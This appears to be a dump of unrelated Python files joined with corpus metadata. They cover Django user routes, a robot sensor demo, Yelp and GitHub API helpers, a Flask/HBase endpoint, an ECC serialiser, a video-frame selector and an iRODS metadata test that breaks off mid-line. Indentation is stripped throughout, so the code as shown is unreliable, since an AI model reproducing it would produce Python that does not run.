plt.hist(trace_tuned[:,j],density=True)
plt.plot(support,norm(support,*parameter_prior_proposal))
return parameter_prior_proposal | 2.234375 | 2 |
users/urls.py | yileye/OpenSA | 280 | 12762462 | #!/usr/bin/env python
# ~*~ coding: utf-8 ~*~
from __future__ import absolute_import
from django.urls import path
from users.views import login, users, groups, project, permission,role,keys
app_name = 'users'
urlpatterns = [
# Login View
path('login/', login.UserLoginView.as_view(), name='login'),
path('logout/', login.UserLogoutView.as_view(), name='logout'),
# User View
path('users-list/', users.UsersListAll.as_view(), name='users_list'),
path('users-add/', users.UsersAdd.as_view(), name='users_add'),
path('users-update/<int:pk>/', users.UsersUpdate.as_view(), name='users_update'),
path('users-all-del/', users.UsersAllDel.as_view(), name='users_all_del'),
path('users-change-password/', users.UsersChangePassword.as_view(), name='users_change_password'),
path('users-detail/<int:pk>/', users.UsersDetail.as_view(), name='users_detail'),
# DepartMent View
path('groups-list/', groups.GroupsListAll.as_view(), name='groups_list'),
path('groups-add/', groups.GroupsAdd.as_view(), name='groups_add'),
path('groups-update/<int:pk>/', groups.GroupsUpdate.as_view(), name='groups_update'),
path('groups-all-del/', groups.GroupsAllDel.as_view(), name='groups_all_del'),
# Project View
path('project-list/', project.ProjectListAll.as_view(), name='project_list'),
path('project-add/', project.ProjectAdd.as_view(), name='project_add'),
path('project-update/<int:pk>/', project.ProjectUpdate.as_view(), name='project_update'),
path('project-all-del/', project.ProjectDel.as_view(), name='project_all_del'),
# KeyManage View
path('key-list/', keys.KeyListAll.as_view(), name='key_list'),
path('key-add/', keys.KeyAdd.as_view(), name='key_add'),
path('key-update/<uuid:pk>/', keys.KeyUpdate.as_view(), name='key_update'),
path('key-all-del/', keys.KeyAllDel.as_view(), name='key_all_del'),
# PermissionList View
path('permission-list/', permission.PermissionListAll.as_view(), name='permission_list'),
path('permission-add/', permission.PermissionAdd.as_view(), name='permission_add'),
path('permission-update/<int:pk>/', permission.PermissionUpdate.as_view(), name='permission_update'),
path('permission-all-del/', permission.PermissionAllDel.as_view(), name='permission_all_del'),
# RoleList View
path('role-list/', role.RoleAll.as_view(), name='role_list'),
path('role-edit/<int:pk>/', role.RoleEdit.as_view(), name='role_edit'),
path('role-all-del/', role.RoleAllDel.as_view(), name='role_all_del'),
] | 1.921875 | 2 |
python_library/examples/linearray_test.py | shurik179/yozh | 1 | 12762463 | <reponame>shurik179/yozh
# Testing reflectance array
import time
import yozh
RED=[255,0,0]
GREEN=[0,255,0]
BLUE=[0,0,255]
bot = yozh.Yozh()
# initialize display
bot.clear_display()
line1=bot.add_textbox(text_wrap=23, line_spacing=1.0)
line2=bot.add_textbox(text_position=(0,25))
line3=bot.add_textbox(text_position=(0,45))
bot.set_text("Yozh initialized!", line1)
time.sleep(1.0)
# show basic info
bot.set_text("FW version: "+ bot.fw_version(), line1)
voltage = bot.battery()
bot.set_text("Voltage: {}".format(voltage), line2)
# set both LEDs to Blue
bot.set_leds(BLUE)
#turn on line reflectance sensors
bot.linearray_on()
# buzz at frequency 440Hz for 1 sec
bot.buzz(440,1.0)
# wait for 3 sec
time.sleep(3.0)
bot.set_text(" ", line2)
bot.set_text("Place robot partly on black and press button A to calibrate", line1)
bot.wait_for(bot.button_A)
bot.set_leds(RED)
bot.calibrate()
bot.set_leds(BLUE)
bot.set_text("Calibration complete", line1)
time.sleep(2.0)
while True:
# print raw values
raw_values = ""
for i in range(8):
raw_values+=str(bot.linearray_raw(i))+"; "
bot.set_text(raw_values, line1)
# print calibrated values
cal_values=""
for i in range(8):
cal_values+=str(round(bot.linearray_cal(i)))+";"
bot.set_text(cal_values,line2)
# print line position
x = round(bot.line_position_white(),1)
bot.set_text("Line: {}".format(x), line3)
if x>0:
bot.set_leds(RED, GREEN)
else:
bot.set_leds(GREEN, RED)
time.sleep(0.3)
| 2.6875 | 3 |
testing/business_lookup_responses.py | ricwillis98/yelp-python | 195 | 12762464 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
import responses
from testing.util import read_json_file
YELP_SAN_FRANCISCO = responses.Response(
method="GET",
url="https://api.yelp.com/v3/businesses/yelp-san-francisco",
json=read_json_file("business_lookup_yelp_san_francisco.json"),
status=200,
)
SACRE_COEUR_PARIS = responses.Response(
method="GET",
url="https://api.yelp.com/v3/businesses/basilique-du-sacré-cœur-de-montmartre-paris-3", # noqa: E501
json=read_json_file("business_lookup_sacre_coeur_paris.json"),
status=200,
)
| 2.21875 | 2 |
github/methods/activity/starring/list_repository_stargazers.py | appheap/PyGithub | 1 | 12762465 | <reponame>appheap/PyGithub<filename>github/methods/activity/starring/list_repository_stargazers.py<gh_stars>1-10
from github.scaffold import Scaffold
from github.types import Response
from github.utils import utils
class ListRepositoryStargazers(Scaffold):
"""
List organization events for the authenticated user
"""
def list_repository_stargazers(
self,
*,
owner: str,
repo: str,
per_page: int = 100,
page: int = 1,
) -> 'Response':
"""
Lists the people that have starred the repository.
:param owner: Username of the user
:param repo: Name of the organization
:param per_page:
Results per page (max "100")
Default: "30"
:param page:
Page number of the results to fetch.
Default: "1"
:return: 'Response'
"""
response = self.get_with_token(
url=f'https://api.github.com/repos/{owner}/{repo}/stargazers',
params={
'per_page': per_page,
'page': page,
},
headers={
'Accept': 'application/vnd.github.v3.star+json',
}
)
if response.status_code == 200:
return Response._parse(
response=response,
success=True,
result=utils.parse_stargazers(response.json()),
)
elif response.status_code == 422:
return Response._parse(
response=response,
success=False,
)
else:
return Response._parse(
response=response,
success=False,
)
| 2.546875 | 3 |
cdc-hbase-c360/c360_flask.py | jerroldlaw/apac-workshops | 8 | 12762466 | from flask import Flask, render_template, request
import json
from thrift import Thrift
from thrift.transport import TSocket,TTransport
from thrift.protocol import TBinaryProtocol
from hbase import Hbase
from hbase.ttypes import ColumnDescriptor,Mutation,BatchMutation,TRegionInfo
from hbase.ttypes import IOError,AlreadyExists
app = Flask(__name__)
@app.route('/getallcustomers')
def getallcustomers():
socket = TSocket.TSocket('hbase', 9090)
socket.setTimeout(5000)
transport = TTransport.TBufferedTransport(socket)
protocol = TBinaryProtocol.TBinaryProtocol(transport)
client = Hbase.Client(protocol)
transport.open()
scanId = client.scannerOpen("C360_STREAM", "", [])
result = client.scannerGetList(scanId, 10)
customers = []
for row in result:
customer = {}
customer["CUSTOMER_ID"] = row.row
customer["FIRST_NAME"] = row.columns.get('C360_STREAM:FIRST_NAME').value
customer["LAST_NAME"] = row.columns.get('C360_STREAM:LAST_NAME').value
# customer["DOB"] = row.columns.get('C360_STREAM:DOB').value
customer["PHONE_TYPE"] = row.columns.get('C360_STREAM:PHONE_TYPE').value
# customer["PHONE_NUM"] = row.columns.get('C360_STREAM:PHONE_NUM').value
customer["ADDRESS_LINE_1"] = row.columns.get('C360_STREAM:ADDRESS_LINE_1').value
customer["ADDRESS_LINE_2"] = row.columns.get('C360_STREAM:ADDRESS_LINE_2').value
# customer["PIN"] = row.columns.get('C360_STREAM:PIN').value
customer["ADDRESS_TYPE"] = row.columns.get('C360_STREAM:ADDRESS_TYPE').value
customers.append(customer)
transport.close()
return json.dumps(customers)
if __name__ == '__main__':
app.run(debug = True)
| 2.1875 | 2 |
playground/util.py | murlokito/playground | 0 | 12762467 | __title__ = "playground"
__author__ = "murlux"
__copyright__ = "Copyright 2019, " + __author__
__credits__ = (__author__, )
__license__ = "MIT"
__email__ = "<EMAIL>"
import json
import logging
from typing import Any, Dict, Optional
from dateutil.relativedelta import relativedelta
from datetime import datetime
from jsonschema import validate, exceptions
from playground import enums
def timestamp_to_date(timestamp=None):
"""
Convert timestamp to datetime object
"""
return datetime.fromtimestamp(int(timestamp))
def setup_logger(name: str = None) -> logging.Logger:
logger = logging.getLogger(name)
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
)
return logger
class ArgumentDebugger:
"""
Class used to debug passed args and kwargs into a determined function
"""
@staticmethod
def print_kwargs(**kwargs):
print(kwargs)
@staticmethod
def print_values(**kwargs):
for key, value in kwargs.items():
print("The value of {} is {}".format(key, value))
def validateJSONString(json_string: str = None) -> Optional[Dict[str, Any]]:
"""
Validates if a string is json or not. If it is, returns the json object.
"""
logger: logging.Logger = setup_logger(name='JSONStringValidator')
if json_string is None:
raise Exception('JSONStringValidator expects `json_string` param to not be None')
json_obj = None
try:
json_obj = json.loads(json_string)
except ValueError as err:
logger.error('Invalid json provided. exc:', exc_info=err)
return None
return json_obj
def validateJSONFile(filename: str = None) -> Optional[Dict[str, Any]]:
"""
Reads a file and validates if it's content is json or not.
"""
logger: logging.Logger = setup_logger(name='JSONFileValidator')
if filename is None:
raise Exception('JSONFileValidator expects `filename` param to not be None')
try:
with open(file=filename, mode='r') as file:
file_content: str = file.read()
return validateJSONString(json_string=file_content)
except IOError as io_exc:
logger.error('I/O Error occurred. exc:', exc_info=io_exc)
except FileNotFoundError as fnf_exc:
logger.error('File not found. exc:', exc_info=fnf_exc)
except OSError as os_exc:
logger.error('System error occurred. exc:', exc_info=os_exc)
def validateJSONSchema(filename: str = None, schema_file: str = None) -> Optional[Dict[str, Any]]:
"""
Reads a file and validates if it's content is json or not as well as
checks if it's schema is according to defaults or not.
"""
logger: logging.Logger = setup_logger(name='JSONSchemaValidator')
def _load_json_schema(schema_filename: str = None) -> Optional[Dict[str, Any]]:
"""
Loads the given schema file.
"""
try:
with open(schema_filename) as schema_file:
return json.loads(schema_file.read())
except IOError as io_exc:
logger.error('I/O Error occurred. exc:', exc_info=io_exc)
except FileNotFoundError as fnf_exc:
logger.error('File not found. exc:', exc_info=fnf_exc)
except OSError as os_exc:
logger.error('System error occurred. exc:', exc_info=os_exc)
if filename is None:
raise Exception('JSONSchemaValidator expects `filename` param to not be None')
data = validateJSONFile(filename=filename)
schema = _load_json_schema(schema_filename=schema_file)
if schema is not None:
try:
validate(data, schema)
except exceptions.ValidationError as ex:
return None
return data
else:
raise Exception('JSONSchemaValidator expects schema file to be valid')
| 2.515625 | 3 |
psi/serialize/ecc.py | delta-mpc/python-psi | 35 | 12762468 | <reponame>delta-mpc/python-psi<filename>psi/serialize/ecc.py
from Crypto.PublicKey import ECC
__all__ = ["point_to_bytes", "key_to_bytes", "bytes_to_key"]
def point_to_bytes(point: ECC.EccPoint):
xs = point.x.to_bytes()
ys = bytes([2 + point.y.is_odd()])
return xs + ys
def key_to_bytes(key: ECC.EccKey):
if key.has_private():
raise ValueError("only public key can be serialized to bytes to send")
return key.export_key(format="DER", compress=True)
def bytes_to_key(data: bytes) -> ECC.EccKey:
return ECC.import_key(data)
| 2.671875 | 3 |
src/vfs/process.py | waikato-datamining/video-frame-selector | 0 | 12762469 | <gh_stars>0
import argparse
import cv2
import os
import traceback
from datetime import datetime
from time import sleep
from yaml import safe_dump
from vfs.common import INPUT_IMAGE_DIR, INPUT_VIDEO, INPUT_WEBCAM, INPUT_TYPES, ANALYSIS_ROISCSV, ANALYSIS_OPEXJSON, \
ANALYSIS_TYPES, OUTPUT_JPG, OUTPUT_MJPG, OUTPUT_TYPES, ANALYSIS_FORMAT, list_images
from vfs.predictions import crop_frame, check_predictions, load_roiscsv, load_opexjson
from vfs.logging import log
def cleanup_file(path):
"""
Removes the file if present.
:param path: the file to remove
:type path: str
"""
if os.path.exists(path):
os.remove(path)
def load_output(analysis_file, analysis_type, metadata):
"""
Loads the generated analysis output file and returns the predictions.
:param analysis_file: the file to check
:type analysis_file: str
:param analysis_type: the type of analysis, see ANALYSIS_TYPES
:type analysis_type: str
:param metadata: for attaching metadata
:type metadata: dict
:return: list of Prediction objects
:rtype: list
"""
if analysis_type == ANALYSIS_ROISCSV:
result = load_roiscsv(analysis_file)
elif analysis_type == ANALYSIS_OPEXJSON:
result = load_opexjson(analysis_file)
else:
raise Exception("Unhandled analysis type: %s" % analysis_type)
metadata["num_predictions"] = len(result)
return result
def process_image(frame, frameno, analysis_input, analysis_output, analysis_tmp,
analysis_timeout, analysis_type, analysis_keep_files,
min_score, required_labels, excluded_labels, poll_interval,
crop_to_content, crop_margin, crop_min_width, crop_min_height,
verbose):
"""
Pushes a frame through the image analysis framework and returns whether to keep it or not.
:param frame: the frame to check
:type frame: ndarray
:param frameno: the current frame no
:type frameno: int
:param analysis_input: the input directory of the image analysis process
:type analysis_input: str
:param analysis_output: the output directory of the image analysis process
:type analysis_output: str
:param analysis_tmp: the tmp directory to write the image to before moving it into the image analysis input dir
:type analysis_tmp: str or None
:param analysis_timeout: the number of seconds to wait for analysis to finish before skipping frame
:type analysis_timeout: float
:param analysis_type: the type of output the analysis is generated, see ANALYSIS_TYPES
:type analysis_type: str
:param analysis_keep_files: whether to keep the analysis files rather than deleting them
:type analysis_keep_files: bool
:param min_score: the minimum score that the predictions have to have
:type min_score: float
:param required_labels: the list of labels that must have the specified min_score, ignored if None or empty
:type required_labels: list or None
:param excluded_labels: the list of labels that must not have the specified min_score, ignored if None or empty
:type excluded_labels: list or None
:param poll_interval: the interval in seconds for the file polling
:type poll_interval: float
:param crop_to_content: whether to crop the frame to the content (eg bounding boxes)
:type crop_to_content: bool
:param crop_margin: the margin to use around the cropped content
:type crop_margin: int
:param crop_min_width: the minimum width for the cropped content
:type crop_min_width: int
:param crop_min_height: the minimum height for the cropped content
:type crop_min_height: int
:param verbose: whether to print some logging information
:type verbose: bool
:return: tuple (whether to keep the frame or skip it, potentially cropped frame)
:rtype: tuple
"""
if analysis_tmp is not None:
img_tmp_file = os.path.join(analysis_tmp, (ANALYSIS_FORMAT % frameno).replace(".EXT", ".jpg"))
img_in_file = os.path.join(analysis_input, (ANALYSIS_FORMAT % frameno).replace(".EXT", ".jpg"))
if verbose:
log("Writing image: %s" % img_tmp_file)
cv2.imwrite(img_tmp_file, frame)
if verbose:
log("Renaming image to: %s" % img_in_file)
os.rename(img_tmp_file, img_in_file)
else:
img_in_file = os.path.join(analysis_input, (ANALYSIS_FORMAT % frameno).replace(".EXT", ".jpg"))
if verbose:
log("Writing image: %s" % img_in_file)
cv2.imwrite(img_in_file, frame)
img_out_file = os.path.join(analysis_output, (ANALYSIS_FORMAT % frameno).replace(".EXT", ".jpg"))
if analysis_type == ANALYSIS_ROISCSV:
name1 = (ANALYSIS_FORMAT % frameno).replace(".EXT", "-rois.csv")
name2 = (ANALYSIS_FORMAT % frameno).replace(".EXT", ".csv")
out_files = [os.path.join(analysis_output, name1), os.path.join(analysis_output, name2)]
elif analysis_type == ANALYSIS_OPEXJSON:
name1 = (ANALYSIS_FORMAT % frameno).replace(".EXT", ".json")
out_files = [os.path.join(analysis_output, name1)]
else:
raise Exception("Unhandled analysis type: %s" % analysis_type)
metadata = dict()
# pass through image analysis
end = datetime.now().microsecond + analysis_timeout * 10e6
while datetime.now().microsecond < end:
for out_file in out_files:
if os.path.exists(out_file):
if verbose:
log("Checking analysis output: %s" % out_file)
predictions = load_output(out_file, analysis_type, metadata)
result = check_predictions(predictions, min_score, required_labels, excluded_labels, verbose)
if not analysis_keep_files:
os.remove(out_file)
if verbose:
log("Can be included: %s" % str(result))
if result:
if crop_to_content:
frame = crop_frame(frame, predictions, metadata,
margin=crop_margin, min_width=crop_min_width, min_height=crop_min_height,
verbose=verbose)
cleanup_file(img_in_file)
cleanup_file(img_out_file)
return result, frame, metadata
sleep(poll_interval)
# clean up if necessary
cleanup_file(img_in_file)
cleanup_file(img_out_file)
return False, frame, metadata
def process(input, input_type, nth_frame, max_frames, analysis_input, analysis_output, analysis_tmp,
analysis_timeout, analysis_type, analysis_keep_files, from_frame, to_frame,
min_score, required_labels, excluded_labels, poll_interval,
output, output_type, output_format, output_tmp, output_fps, output_metadata,
crop_to_content, crop_margin, crop_min_width, crop_min_height,
verbose, progress, keep_original):
"""
Processes the input video or webcam feed.
:param input: the input dir, video or webcam ID
:type input: str
:param input_type: the type of input, INPUT_TYPES
:type input_type: str
:param nth_frame: for frame skipping to speed up processing
:type nth_frame: int
:param max_frames: the maximum number of processed frames before exiting (<=0 for unlimited)
:type max_frames: int
:param analysis_input: the input directory of the image analysis process
:type analysis_input: str or None
:param analysis_output: the output directory of the image analysis process
:type analysis_output: str or None
:param analysis_tmp: the tmp directory to write the image to before moving it into the image analysis input dir
:type analysis_tmp: str or None
:param analysis_timeout: the number of seconds to wait for analysis to finish before skipping frame
:type analysis_timeout: float
:param analysis_type: the type of output the analysis is generated, see ANALYSIS_TYPES
:type analysis_type: str
:param analysis_keep_files: whether to keep the analysis files rather than deleting them
:type analysis_keep_files: bool
:param from_frame: the starting frame (incl), ignored if <=0
:type from_frame: int
:param to_frame: the last frame (incl), ignored if <=0
:type to_frame: int
:param min_score: the minimum score that the predictions have to have
:type min_score: float
:param required_labels: the list of labels that must have the specified min_score, ignored if None or empty
:type required_labels: list
:param excluded_labels: the list of labels that must not have the specified min_score, ignored if None or empty
:type excluded_labels: list
:param poll_interval: the interval in seconds for the file polling
:type poll_interval: float
:param output: the output video oor directory for output images
:type output: str
:param output_type: the type of output to generate, see OUTPUT_TYPES
:type output_type: str
:param output_format: the file name format to use for the image files
:type output_format: str
:param output_tmp: the tmp directory to write the output images to before moving them to the output directory
:type output_tmp: str
:param output_fps: the frames-per-second to use when generating an output video
:type output_fps: int
:param output_metadata: whether to output metadata as YAML file alongside JPG frames
:type output_metadata: bool
:param crop_to_content: whether to crop the frame to the content (eg bounding boxes)
:type crop_to_content: bool
:param crop_margin: the margin to use around the cropped content
:type crop_margin: int
:param crop_min_width: the minimum width for the cropped content
:type crop_min_width: int
:param crop_min_height: the minimum height for the cropped content
:type crop_min_height: int
:param verbose: whether to print some logging information
:type verbose: bool
:param progress: in verbose mode, outputs a progress line every x frames with how many frames have been processed
:type progress: int
:param keep_original: whether to keep the original filename when processing an image dir
:type keep_original: bool
"""
# open input
if input_type not in INPUT_TYPES:
raise Exception("Unknown input type: %s" % input_type)
cap = None
files = None
if input_type == INPUT_IMAGE_DIR:
files = list_images(input, verbose=verbose)
elif input_type == INPUT_VIDEO:
if verbose:
log("Opening input video: %s" % input)
cap = cv2.VideoCapture(input)
elif input_type == INPUT_WEBCAM:
if verbose:
log("Opening webcam: %s" % input)
cap = cv2.VideoCapture(int(input))
else:
raise Exception("Unhandled input type: %s" % input_type)
# frames
if (from_frame > 0) and (to_frame > 0):
if from_frame > to_frame:
raise Exception("from_frame (%d) cannot be larger than to_frame (%d)" % (from_frame, to_frame))
# analysis
if analysis_type not in ANALYSIS_TYPES:
raise Exception("Unknown analysis type: %s" % analysis_type)
if (analysis_input is not None) and (analysis_output is None):
raise Exception("No analysis output dir specified, but analysis input dir provided!")
if (analysis_input is None) and (analysis_output is not None):
raise Exception("No analysis input dir specified, but analysis output dir provided!")
# open output
out = None
if output_type not in OUTPUT_TYPES:
raise Exception("Unknown output type: %s" % output_type)
if output_type == OUTPUT_MJPG:
if verbose:
log("Opening output video: %s" % output)
frame_width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
frame_height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
out = cv2.VideoWriter(output, cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), output_fps, (frame_width, frame_height))
crop_to_content = False
elif output_type == OUTPUT_JPG:
if (output_format % 1) == output_format:
raise Exception("Output format does not expand integers: %s" % output_format)
else:
raise Exception("Unhandled output type: %s" % output_type)
# iterate frames
count = 0
frames_count = 0
frames_processed = 0
while ((cap is not None) and cap.isOpened()) or (files is not None):
# next frame
if cap is not None:
retval, frame = cap.read()
else:
retval = frames_count < len(files)
if retval:
frame = cv2.imread(files[frames_count])
count += 1
frames_count += 1
if (frames_count % progress) == 0:
log("Frames processed: %d" % frames_count)
# check frame window
if (from_frame > 0) and (frames_count < from_frame):
continue
if (to_frame > 0) and (frames_count > to_frame):
log("Reached to_frame (%d)" % to_frame)
break
if (max_frames > 0) and (frames_processed >= max_frames):
if verbose:
log("Maximum number of processed frames reached: %d" % frames_processed)
break
# process frame
if retval:
if count >= nth_frame:
count = 0
metadata = None
# do we want to keep frame?
if analysis_input is not None:
keep, frame, metadata = process_image(frame, frames_count, analysis_input, analysis_output, analysis_tmp,
analysis_timeout, analysis_type, analysis_keep_files, min_score,
required_labels, excluded_labels, poll_interval,
crop_to_content, crop_margin, crop_min_width, crop_min_height,
verbose)
if not keep:
continue
frames_processed += 1
if out is not None:
out.write(frame)
else:
# keep original filename when using image_dir
tmp_file = None
if (files is not None) and keep_original:
if output_tmp is not None:
tmp_file = os.path.join(output_tmp, os.path.basename(files[frames_count - 1]))
out_file = os.path.join(output, os.path.basename(files[frames_count - 1]))
else:
if output_tmp is not None:
tmp_file = os.path.join(output_tmp, output_format % frames_count)
out_file = os.path.join(output, output_format % frames_count)
if output_tmp is not None:
cv2.imwrite(tmp_file, frame)
os.rename(tmp_file, out_file)
if verbose:
log("Frame written to: %s" % out_file)
if output_metadata and (metadata is not None):
tmp_file = os.path.splitext(tmp_file)[0] + ".yaml"
out_file = os.path.splitext(out_file)[0] + ".yaml"
with open(tmp_file, "w") as yf:
safe_dump(metadata, yf)
os.rename(tmp_file, out_file)
if verbose:
log("Meta-data written to: %s" % out_file)
else:
cv2.imwrite(out_file, frame)
if verbose:
log("Frame written to: %s" % out_file)
if output_metadata and (metadata is not None):
out_file = os.path.splitext(out_file)[0] + ".yaml"
with open(out_file, "w") as yf:
safe_dump(metadata, yf)
if verbose:
log("Meta-data written to: %s" % out_file)
else:
break
log("Frames processed: %d" % frames_count)
if cap is not None:
cap.release()
if out is not None:
out.release()
def main(args=None):
"""
The main method for parsing command-line arguments and running the application.
:param args: the commandline arguments, uses sys.argv if not supplied
:type args: list
"""
parser = argparse.ArgumentParser(
prog="vfs-process",
description="Tool for replaying videos or grabbing frames from webcam, presenting it to an image analysis "
+ "framework to determine whether to include the frame in the output.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--input", metavar="DIR_OR_FILE_OR_ID", help="the dir with images, video file to read or the webcam ID", required=True)
parser.add_argument("--input_type", help="the input type", choices=INPUT_TYPES, required=True)
parser.add_argument("--nth_frame", metavar="INT", help="every nth frame gets presented to the analysis process", required=False, type=int, default=10)
parser.add_argument("--max_frames", metavar="INT", help="the maximum number of processed frames before exiting (<=0 for unlimited)", required=False, type=int, default=0)
parser.add_argument("--from_frame", metavar="INT", help="the starting frame (incl.); ignored if <= 0", required=False, type=int, default=-1)
parser.add_argument("--to_frame", metavar="INT", help="the last frame to process (incl.); ignored if <= 0", required=False, type=int, default=-1)
parser.add_argument("--analysis_input", metavar="DIR", help="the input directory used by the image analysis process; if not provided, all frames get accepted", required=False)
parser.add_argument("--analysis_tmp", metavar="DIR", help="the temporary directory to place the images in before moving them into the actual input directory (to avoid race conditions)", required=False)
parser.add_argument("--analysis_output", metavar="DIR", help="the output directory used by the image analysis process", required=False)
parser.add_argument("--analysis_timeout", metavar="SECONDS", help="the maximum number of seconds to wait for the image analysis to finish processing", required=False, type=float, default=10)
parser.add_argument("--analysis_type", help="the type of output the analysis process generates", choices=ANALYSIS_TYPES, required=False, default=ANALYSIS_TYPES[0])
parser.add_argument("--analysis_keep_files", help="whether to keep the analysis files rather than deleting them", action="store_true", required=False)
parser.add_argument("--min_score", metavar="FLOAT", help="the minimum score that a prediction must have", required=False, type=float, default=0.0)
parser.add_argument("--required_labels", metavar="LIST", help="the comma-separated list of labels that the analysis output must contain (with high enough scores)", required=False)
parser.add_argument("--excluded_labels", metavar="LIST", help="the comma-separated list of labels that the analysis output must not contain (with high enough scores)", required=False)
parser.add_argument('--poll_interval', type=float, help='interval in seconds for polling for result files', required=False, default=0.1)
parser.add_argument("--output", metavar="DIR_OR_FILE", help="the output directory or file for storing the selected frames (use .avi or .mkv for videos)", required=True)
parser.add_argument("--output_type", help="the type of output to generate", choices=OUTPUT_TYPES, required=True)
parser.add_argument("--output_format", metavar="FORMAT", help="the format string for the images, see https://docs.python.org/3/library/stdtypes.html#old-string-formatting", required=False, default="%06d.jpg")
parser.add_argument("--output_tmp", metavar="DIR", help="the temporary directory to write the output images to before moving them to the output directory (to avoid race conditions with processes that pick up the images)", required=False)
parser.add_argument("--output_fps", metavar="FORMAT", help="the frames per second to use when generating a video", required=False, type=int, default=25)
parser.add_argument("--crop_to_content", help="whether to crop the frame to the detected content", action="store_true", required=False)
parser.add_argument("--crop_margin", metavar="INT", help="the margin in pixels to use around the determined crop region", required=False, type=int, default=0)
parser.add_argument("--crop_min_width", metavar="INT", help="the minimum width for the cropped content", required=False, type=int, default=2)
parser.add_argument("--crop_min_height", metavar="INT", help="the minimum height for the cropped content", required=False, type=int, default=2)
parser.add_argument("--output_metadata", help="whether to output a YAML file alongside the image with some metadata when outputting frame images", required=False, action="store_true")
parser.add_argument("--progress", metavar="INT", help="every nth frame a progress message is output on stdout", required=False, type=int, default=100)
parser.add_argument("--keep_original", help="keeps the original file name when processing an image dir", action="store_true", required=False)
parser.add_argument("--verbose", help="for more verbose output", action="store_true", required=False)
parsed = parser.parse_args(args=args)
# parse labels
required_labels = None
if parsed.required_labels is not None:
required_labels = parsed.required_labels.split(",")
excluded_labels = None
if parsed.excluded_labels is not None:
excluded_labels = parsed.excluded_labels.split(",")
process(input=parsed.input, input_type=parsed.input_type, nth_frame=parsed.nth_frame, max_frames=parsed.max_frames,
analysis_input=parsed.analysis_input, analysis_output=parsed.analysis_output,
analysis_tmp=parsed.analysis_tmp, analysis_timeout=parsed.analysis_timeout,
analysis_type=parsed.analysis_type, analysis_keep_files=parsed.analysis_keep_files,
from_frame=parsed.from_frame, to_frame=parsed.to_frame,
min_score=parsed.min_score, required_labels=required_labels, excluded_labels=excluded_labels,
poll_interval=parsed.poll_interval,
output=parsed.output, output_type=parsed.output_type, output_format=parsed.output_format,
output_tmp=parsed.output_tmp, output_fps=parsed.output_fps, output_metadata=parsed.output_metadata,
crop_to_content=parsed.crop_to_content, crop_margin=parsed.crop_margin,
crop_min_width=parsed.crop_min_width, crop_min_height=parsed.crop_min_height,
verbose=parsed.verbose, progress=parsed.progress, keep_original=parsed.keep_original)
def sys_main():
"""
Runs the main function using the system cli arguments, and
returns a system error code.
:return: 0 for success, 1 for failure.
:rtype: int
"""
try:
main()
return 0
except Exception:
print(traceback.format_exc())
return 1
if __name__ == '__main__':
main()
| 2.1875 | 2 |
avu-protect/avuprotecttest.py | seandavi/irods_contrib | 10 | 12762470 | """Test the rules that protect AVU records having attributes with a
given prefix.
"""
import ConfigParser
import subprocess
import unittest
class AVUProtectTest(unittest.TestCase): #pylint: disable=R0904
"""Test suite based on the unittest framework."""
def __init__(self, *args, **kwargs):
"""Read configuration."""
super(AVUProtectTest, self).__init__(*args, **kwargs)
config = ConfigParser.RawConfigParser()
config.read('avuprotecttest.cfg')
self.rodspw = config.get('AVUProtectTest', 'admin_password')
self.expcoll = config.get('AVUProtectTest', 'expcoll')
self.testfile = config.get('AVUProtectTest', 'testfile')
self.attrprefix = config.get('AVUProtectTest', 'attrprefix')
self.fpath = self.expcoll + "/" + self.testfile
def listavus(self):
"""Print the AVUs for the test file."""
ret = subprocess.call("imeta ls -d '" + self.fpath + "'", shell=True)
self.assertEqual(ret, 0)
def listfiles(self):
"""Print the list of files in the collection."""
ret = subprocess.call("ils '" + self.expcoll + "'", shell=True)
self.assertEqual(ret, 0)
def setUp(self): #pylint: disable=C0103
"""Setup done before each test is called."""
if (self.rodspw == "" or
self.expcoll == "" or
self.testfile == "" or
self.attrprefix == ""):
print ("Edit avuprotesttest.cfg to specify collection, "
"temporary filename, "
"and attribute name prefix to use for testing.")
exit()
ret = subprocess.call("touch '" + self.testfile + "'", shell=True)
self.assertEqual(ret, 0)
ret = subprocess.call("iput '"
+ self.testfile + "' '"
+ self.expcoll + "'",
shell=True)
self.assertEqual(ret, 0)
def tearDown(self): #pylint: disable=C0103
"""Cleanup done aftr each test is called."""
ret = subprocess.call(["rm", self.testfile])
self.assertEqual(ret, 0)
ret = subprocess.call("irm -f '" + self.fpath + "'", shell=True)
self.assertEqual(ret, 0)
def test_01_disallow_add_nonadmin(self):
"""Do not allow non-admin users to add protected AVU."""
ret = subprocess.call("imeta add -d '"
+ self.fpath
+ "' '" + self.attrprefix + "archive' 'true'",
shell=True)
self.assertEqual(ret, 4)
def test_02_allow_add_nonadmin(self):
"""Confirm non-protected AVUs can be added."""
ret = subprocess.call("imeta add -d '"
+ self.fpath
+ "' 'T2T3' 'nonadmin'",
shell=True)
self.assertEqual(ret, 0)
def test_03_allow_rm_nonadmin(self):
"""Confirm non-protected AVUs can be removed."""
# Add the non-protected AVU.
ret = subprocess.call("imeta add -d '"
+ self.fpath
+ "' 'T2T3' 'nonadmin'",
shell=True)
self.assertEqual(ret, 0)
# Remove the non-protected AVU.
ret = subprocess.call("imeta rm -d '"
+ self.fpath
+ "' 'T2T3' 'nonadmin'",
shell=True)
self.assertEqual(ret, 0)
def test_04_allow_mod_nonadmin(self):
"""Confirm non-protected AVUs can be modified."""
# Add the non-protected AVU.
ret = subprocess.call("imeta add -d '"
+ self.fpath
+ "' 'T4-1' 'nonadmin'",
shell=True)
self.assertEqual(ret, 0)
# Modify the non-protected AVU.
ret = subprocess.call("imeta mod -d '"
+ self.fpath
+ "' 'T4-1' 'nonadmin' 'n:T4-2' 'v:nonadmin-2'",
shell=True)
self.assertEqual(ret, 0)
# Remove the non-protected AVU.
ret = subprocess.call("imeta rm -d '"
+ self.fpath
+ "' 'T4-2' 'nonadmin-2'",
shell=True)
self.assertEqual(ret, 0)
def test_05_allow_add_admin(self):
"""Confirm an admin can still add protected AVUs."""
# Grant admin write permission on the test file.
ret = subprocess.call("ichmod write rods '"
+ self.fpath
+ "'",
shell=True)
self.assertEqual(ret, 0)
# Add the protected AVU.
ret = subprocess.call("export irodsUserName='rods'; "
+ "export irodsAuthScheme='password'; "
